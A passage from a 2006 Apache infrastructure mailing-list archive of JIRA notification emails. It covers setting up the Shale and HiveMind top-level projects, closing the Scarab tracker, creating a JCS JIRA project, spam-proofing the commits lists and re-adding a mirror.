protected] > [email protected] > [email protected] > [email protected] > [email protected] > [email protected] > [2.2] Setup Characteristics > All lists except pmc should be set up to require subscription before posting, have the Reply-To header set, and suppress trailers. > PMC list should also require moderation for subscription requests > [2.3] Initial Moderators For All Lists > Craig McClanahan <[email protected]> (may also need <[email protected]> if moderation is fussy about Sender: heading) > James Mitchell <[email protected]> > Wendy Smoak <[email protected]> > Gary VanMatre <[email protected]> > [2.4] Archives > http://shale.apache.org/mail/dev/YYYYMM.gz > http://shale.apache.org/mail/users/YYYYMM.gz > http://shale.apache.org/mail/commits/YYYYMM.gz > http://shale.apache.org/mail/issues/YYYYMM.gz > http://shale.apache.org/mail/notifications/YYYYMM.gz > http://shale.apache.org/mail/pmc/YYYYMM.gz (Restricted access???) > #======================================= > [3] Source Repository > As PMC chair, I volunteer to be a Subversion admin, and can set up the new space, authorizations, and copy/move old sources myself. > Commit notifications should go to [email protected] > #======================================= > [4] Issue Tracker > We'd like to stick with JIRA, and are open to being in either the common JIRA instance, the Struts one, or a new instance just for Shale. > #======================================= > [5] Wiki > New wiki instance "http://wiki.apache.org/shale" on MoinMoin. > #======================================= > [6] Initial Committer list > Craig McClanahan <[email protected]> > James Mitchell <[email protected]> > Greg Reddin <[email protected]> > Sean Schofield <[email protected]> > Wendy Smoak <[email protected]> > Gary VanMatre <[email protected]> > Matthias Wessendorf <[email protected] -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 04:48:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39530 invoked from network); 29 Jun 2006 04:48:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 04:48:12 -0000 Received: (qmail 38723 invoked by uid 500); 29 Jun 2006 04:48:08 -0000 Delivered-To: [email protected] Received: (qmail 38438 invoked by uid 500); 29 Jun 2006 04:48:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38418 invoked by uid 99); 29 Jun 2006 04:48:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 21:48:07 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 21:48:06 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 090FF410005 for <[email protected]>; Thu, 29 Jun 2006 04:46:30 +0000 (GMT) Message-ID: <4859770.1151556390020.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 04:46:30 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-867) investigate making *-commits lists moderator less and spam proof MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N investigate making *-commits lists moderator less and spam proof ---------------------------------------------------------------- Key: INFRA-867 URL: http://issues.apache.org/jira/browse/INFRA-867 Project: Infrastructure Type: Improvement Security: public (Regular issues) Components: Mailing Lists Reporter: Brett Porter We can check the server and sender format to ensure these lists are receiving messages from a legitimate location. The same rules could be used for notifications and issues lists. We probably should allow any apache server to avoid needing any big changes if SVN moves machines like it did recently. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 07:04:12 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 66636 invoked from network); 29 Jun 2006 07:04:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 07:04:10 -0000 Received: (qmail 54211 invoked by uid 500); 29 Jun 2006 07:04:09 -0000 Delivered-To: [email protected] Received: (qmail 53949 invoked by uid 500); 29 Jun 2006 07:04:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 53937 invoked by uid 99); 29 Jun 2006 07:04:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 00:04:07 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 00:04:07 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2FA087141F3 for <[email protected]>; Thu, 29 Jun 2006 07:02:30 +0000 (GMT) Message-ID: <5878110.1151564550177.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 07:02:30 +0000 (GMT+00:00) From: "Scott Eade (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-558) please close the scarab tracker for Turbine 2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-558?page=comments#action_12418397 ] Scott Eade commented on INFRA-558: ---------------------------------- I have turned off most of the modules in Scarab and am working on getting the remaining ones closed. Once this has been completed the Scarab instance will be shutdown so unfortunately the history will no longer be available. > please close the scarab tracker for Turbine 2 > --------------------------------------------- > > Key: INFRA-558 > URL: http://issues.apache.org/jira/browse/INFRA-558 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Scarab > Reporter: Henning Schmiedehausen > > The Jakarta Turbine issue tracker has been moved from Scarab to JIRA. As there are no more outstanding bugs in the relevant Turbine 2 modules, > we'd like to close the Scarab bug tracker down. If possible, it would be nice to keep the existing bugs as reference for the changes (so just make the > categories read-only), if not, please remove the following categories: > Turbine > Turbine-2 > Turbine > Turbine-2 > Source > Turbine > Turbine-2 > Documentation > Global > Fulcrum > Fulcrum > Source > Fulcrum > Documentation > We will deal with TDK and JCS later. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 07:14:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69667 invoked from network); 29 Jun 2006 07:14:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 07:14:13 -0000 Received: (qmail 65548 invoked by uid 500); 29 Jun 2006 07:14:08 -0000 Delivered-To: [email protected] Received: (qmail 65213 invoked by uid 500); 29 Jun 2006 07:14:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65202 invoked by uid 99); 29 Jun 2006 07:14:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 00:14:07 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 00:14:06 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id BCD6F7141F3 for <[email protected]>; Thu, 29 Jun 2006 07:12:29 +0000 (GMT) Message-ID: <15970346.1151565149743.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 07:12:29 +0000 (GMT+00:00) From: "Scott Eade (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-868) JCS is a distributed caching system written in java. It is intended to speed up applications by providing a means to manage cached data of various dynamic natures. MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N JCS is a distributed caching system written in java. It is intended to speed up applications by providing a means to manage cached data of various dynamic natures. ------------------------------------------------------------------------------------------------------------------------------------------------------------------- Key: INFRA-868 URL: http://issues.apache.org/jira/browse/INFRA-868 Project: Infrastructure Type: New JIRA Project Security: public (Regular issues) Reporter: Scott Eade -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 07:20:16 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74880 invoked from network); 29 Jun 2006 07:20:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 07:20:15 -0000 Received: (qmail 72826 invoked by uid 500); 29 Jun 2006 07:20:12 -0000 Delivered-To: [email protected] Received: (qmail 72554 invoked by uid 500); 29 Jun 2006 07:20:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 72543 invoked by uid 99); 29 Jun 2006 07:20:10 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 00:20:10 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 00:20:10 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 5CE7C7141F5 for <[email protected]>; Thu, 29 Jun 2006 07:18:33 +0000 (GMT) Message-ID: <28631361.1151565513377.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 07:18:33 +0000 (GMT+00:00) From: "Scott Eade (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-868) JCS is a distributed caching system written in java. It is intended to speed up applications by providing a means to manage cached data of various dynamic natures. In-Reply-To: <15970346.1151565149743.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-868?page=comments#action_12418401 ] Scott Eade commented on INFRA-868: ---------------------------------- Okay I am looking at http://wiki.apache.org/general/ApacheBugzillaToJiraMigration for direction - it gives a bunch of steps. Step 1: Agree to move. Scarab is in the process of being shutdown - the move to JIRA was floated on the jcs-dev list and there were no objections. Step 2: Do we want to migrate the existing data. We will transfer the open issues manually - there are not many of them. Step 3: Project structure. "JCS" (we are a subproject of Jakarta). Step 4: Pick project key. "JCS" Step 5: List of developers. Aaron Smuts - [email protected] Hanson Char - [email protected] Travis Savo - [email protected] Scott Eade - [email protected] Step 6: Pick an administrator Scott Eade - [email protected] (for now, can switch over to Aaron after setup) Step 7: Enter a request in JIRA Details will include: - Vote results - no vote taken - Whether you want to import bugzilla data:? No - List of projects with keys: JCS (key: JCS) - email address to send notifications: [email protected] - email address of administrator: [email protected] - project category: Jakarta - permission scheme: Jakarta permissions > JCS is a distributed caching system written in java. It is intended to speed up applications by providing a means to manage cached data of various dynamic natures. > ------------------------------------------------------------------------------------------------------------------------------------------------------------------- > > Key: INFRA-868 > URL: http://issues.apache.org/jira/browse/INFRA-868 > Project: Infrastructure > Type: New JIRA Project > Security: public(Regular issues) > Reporter: Scott Eade > -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 07:22:11 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 78016 invoked from network); 29 Jun 2006 07:22:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 07:22:10 -0000 Received: (qmail 74768 invoked by uid 500); 29 Jun 2006 07:22:08 -0000 Delivered-To: [email protected] Received: (qmail 74481 invoked by uid 500); 29 Jun 2006 07:22:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74470 invoked by uid 99); 29 Jun 2006 07:22:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 00:22:07 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 00:22:07 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2C3247141F3 for <[email protected]>; Thu, 29 Jun 2006 07:20:30 +0000 (GMT) Message-ID: <20653956.1151565630162.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 07:20:30 +0000 (GMT+00:00) From: "Scott Eade (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-868) JCS is a distributed caching system written in java. It is intended to speed up applications by providing a means to manage cached data of various dynamic natures. In-Reply-To: <15970346.1151565149743.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-868?page=comments#action_12418402 ] Scott Eade commented on INFRA-868: ---------------------------------- I forgot to add my thanks in advance for whoever it is that implements this request. Scott > JCS is a distributed caching system written in java. It is intended to speed up applications by providing a means to manage cached data of various dynamic natures. > ------------------------------------------------------------------------------------------------------------------------------------------------------------------- > > Key: INFRA-868 > URL: http://issues.apache.org/jira/browse/INFRA-868 > Project: Infrastructure > Type: New JIRA Project > Security: public(Regular issues) > Reporter: Scott Eade > -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 08:17:13 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10990 invoked from network); 29 Jun 2006 08:17:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 08:17:12 -0000 Received: (qmail 44442 invoked by uid 500); 29 Jun 2006 08:17:09 -0000 Delivered-To: [email protected] Received: (qmail 44120 invoked by uid 500); 29 Jun 2006 08:17:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44108 invoked by uid 99); 29 Jun 2006 08:17:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 01:17:07 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 01:17:07 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 282D3410005 for <[email protected]>; Thu, 29 Jun 2006 08:15:30 +0000 (GMT) Message-ID: <30149292.1151568930161.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 08:15:30 +0000 (GMT+00:00) From: "Henning Schmiedehausen (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-558) please close the scarab tracker for Turbine 2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-558?page=comments#action_12418406 ] Henning Schmiedehausen commented on INFRA-558: ---------------------------------------------- Can we import the old bug reports (the closed ones) into JIRA just as the Torque people did? I do remember that there seems to be a way using TSV to import the Scarab database > please close the scarab tracker for Turbine 2 > --------------------------------------------- > > Key: INFRA-558 > URL: http://issues.apache.org/jira/browse/INFRA-558 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Scarab > Reporter: Henning Schmiedehausen > > The Jakarta Turbine issue tracker has been moved from Scarab to JIRA. As there are no more outstanding bugs in the relevant Turbine 2 modules, > we'd like to close the Scarab bug tracker down. If possible, it would be nice to keep the existing bugs as reference for the changes (so just make the > categories read-only), if not, please remove the following categories: > Turbine > Turbine-2 > Turbine > Turbine-2 > Source > Turbine > Turbine-2 > Documentation > Global > Fulcrum > Fulcrum > Source > Fulcrum > Documentation > We will deal with TDK and JCS later. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 08:41:11 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20651 invoked from network); 29 Jun 2006 08:41:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 08:41:11 -0000 Received: (qmail 72459 invoked by uid 500); 29 Jun 2006 08:41:09 -0000 Delivered-To: [email protected] Received: (qmail 72195 invoked by uid 500); 29 Jun 2006 08:41:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 72176 invoked by uid 99); 29 Jun 2006 08:41:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 01:41:07 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 01:41:07 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2EBDC410005 for <[email protected]>; Thu, 29 Jun 2006 08:39:30 +0000 (GMT) Message-ID: <23231803.1151570370161.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 08:39:30 +0000 (GMT+00:00) From: "Henri Yandell (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-866) Create Shale TLP In-Reply-To: <13908927.1151540729787.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-866?page=comments#action_12418412 ] Henri Yandell commented on INFRA-866: ------------------------------------- Craig added as a chair in svn so has perms to make (most) changes. The one you can't do Craig is to create the shale directory itself. Will you be wanting a fresh directory, or is there a directory within Struts that you would want moving to be that directory (once lists are setup)? > Create Shale TLP > ---------------- > > Key: INFRA-866 > URL: http://issues.apache.org/jira/browse/INFRA-866 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Reporter: Craig McClanahan > > As approved by the Board at the June 2006 meeting, please set up the infrastrcture for the Shale TLP: > #======================================= > [1] Root Tasks (do these need to be mailed separately?) > Create unix group "shale" > Add following usernames to group "shale": craigmcc, jmitchell, greddin, schof, wsmoak, gvanmatre, matzew > Create new DNS entry "shale.apache.org" and configure into website server instance > #======================================= > [2] Mailing Lists > [2.1] Addresses > [email protected] > [email protected] > [email protected] > [email protected] > [email protected] > [email protected] > [2.2] Setup Characteristics > All lists except pmc should be set up to require subscription before posting, have the Reply-To header set, and suppress trailers. > PMC list should also require moderation for subscription requests > [2.3] Initial Moderators For All Lists > Craig McClanahan <[email protected]> (may also need <[email protected]> if moderation is fussy about Sender: heading) > James Mitchell <[email protected]> > Wendy Smoak <[email protected]> > Gary VanMatre <[email protected]> > [2.4] Archives > http://shale.apache.org/mail/dev/YYYYMM.gz > http://shale.apache.org/mail/users/YYYYMM.gz > http://shale.apache.org/mail/commits/YYYYMM.gz > http://shale.apache.org/mail/issues/YYYYMM.gz > http://shale.apache.org/mail/notifications/YYYYMM.gz > http://shale.apache.org/mail/pmc/YYYYMM.gz (Restricted access???) > #======================================= > [3] Source Repository > As PMC chair, I volunteer to be a Subversion admin, and can set up the new space, authorizations, and copy/move old sources myself. > Commit notifications should go to [email protected] > #======================================= > [4] Issue Tracker > We'd like to stick with JIRA, and are open to being in either the common JIRA instance, the Struts one, or a new instance just for Shale. > #======================================= > [5] Wiki > New wiki instance "http://wiki.apache.org/shale" on MoinMoin. > #======================================= > [6] Initial Committer list > Craig McClanahan <[email protected]> > James Mitchell <[email protected]> > Greg Reddin <[email protected]> > Sean Schofield <[email protected]> > Wendy Smoak <[email protected]> > Gary VanMatre <[email protected]> > Matthias Wessendorf <[email protected] -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 08:47:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24940 invoked from network); 29 Jun 2006 08:47:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 08:47:12 -0000 Received: (qmail 93847 invoked by uid 500); 29 Jun 2006 08:47:10 -0000 Delivered-To: [email protected] Received: (qmail 93602 invoked by uid 500); 29 Jun 2006 08:47:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93591 invoked by uid 99); 29 Jun 2006 08:47:09 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 01:47:09 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 01:47:09 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 263614101A8 for <[email protected]>; Thu, 29 Jun 2006 08:45:32 +0000 (GMT) Message-ID: <10778985.1151570732153.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 08:45:32 +0000 (GMT+00:00) From: "Henri Yandell (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-823) Create HiveMind TLP In-Reply-To: <22742649.1149042870067.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-823?page=comments#action_12418413 ] Henri Yandell commented on INFRA-823: ------------------------------------- James added as pmc chair in svn. When mailing lists are created, I'll coordinate an svn move with James. > Create HiveMind TLP > ------------------- > > Key: INFRA-823 > URL: http://issues.apache.org/jira/browse/INFRA-823 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Reporter: James Carman > > #======================================= > [1] Mailing List (i) addresses > I. [email protected] > II. [email protected] > III. [email protected] > (ii) remote moderators ... > James Carman <[email protected]> > (iii) archives > mbox > I. http://hivemind.apache.org/mail/dev/YYYYMM.gz > II. http://hivemind.apache.org/mail/users/YYYYMM.gz > III. http://hivemind.apache.org/mail/commits/YYYYMM.gz > (iv) options > I. Reply-To: Header [X] yes [ ] no > NOTE: [email protected] -> [email protected] > II. Message Trailer [ ] yes [X] no > #======================================= > [2] Source Tracker > (i) Subversion > We will create https://svn.apache.org/repos/asf/hivemind/ and start > SVN-copying our existing resources > there. > Will it be possible to mark > https://svn.apache.org/repos/asf/jakarta/hivemind/ as read-only? > The PMC chair can create the project namespace (svn mkdir) and modify the > asf-authorization file accordingly. > Just tell us about any special requirements - i.e. mailing lists configs. > #======================================= > [3] Initial Committer list > * James Carman ([email protected]) > * Achim Huegen ([email protected]) > * Harish Krishnaswamy ([email protected]) > * Howard M. Lewis Ship ([email protected]) > * Knut Wannheden ([email protected]) > #======================================= > [4] Snapshots > Create directory http://people.apache.org/snapshots/hivemind > Tweak the script that creates the snapshots (~apmail/bin/taritup). > #======================================= -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 14:42:16 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46883 invoked from network); 29 Jun 2006 14:42:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 14:42:14 -0000 Received: (qmail 54674 invoked by uid 500); 29 Jun 2006 14:42:13 -0000 Delivered-To: [email protected] Received: (qmail 54305 invoked by uid 500); 29 Jun 2006 14:42:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54200 invoked by uid 99); 29 Jun 2006 14:42:10 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 07:42:10 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jun 2006 07:42:08 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 24996410124 for <[email protected]>; Thu, 29 Jun 2006 14:40:31 +0000 (GMT) Message-ID: <30327300.1151592031147.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 14:40:31 +0000 (GMT+00:00) From: "Evan Borgstrom (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-869) Re-addition of mirrored.ca MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Re-addition of mirrored.ca -------------------------- Key: INFRA-869 URL: http://issues.apache.org/jira/browse/INFRA-869 Project: Infrastructure Type: New Feature Security: public (Regular issues) Components: Mirrors Environment: N/A Reporter: Evan Borgstrom After a very frustrating period the mirrored.ca machine has been rebuilt and service has been restored. apache.mirrored.ca is ready to be re-added to the mirror list. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 15:17:15 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61759 invoked from network); 29 Jun 2006 15:17:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 15:17:12 -0000 Received: (qmail 28715 invoked by uid 500); 29 Jun 2006 15:17:09 -0000 Delivered-To: [email protected] Received: (qmail 28450 invoked by uid 500); 29 Jun 2006 15:17:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> 